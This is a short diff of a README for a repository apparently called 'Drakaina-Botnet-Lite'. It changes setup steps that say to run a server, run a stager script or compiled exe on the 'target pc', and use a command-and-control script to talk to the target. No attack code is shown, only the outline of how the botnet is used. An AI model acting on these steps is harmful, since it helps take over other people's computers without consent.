Axalz/Drakaina-Botnet-Lite/README.md

 3) run " python server.py "

-4) on target pc run " python stager.py "
+4) on target pc run " python stager.py " or run the compiled exe

-5) run " commandandcontrol.py " to communicate with target pc
+5) run " commandandcontrol.py " to communicate with target.

 ----------------------------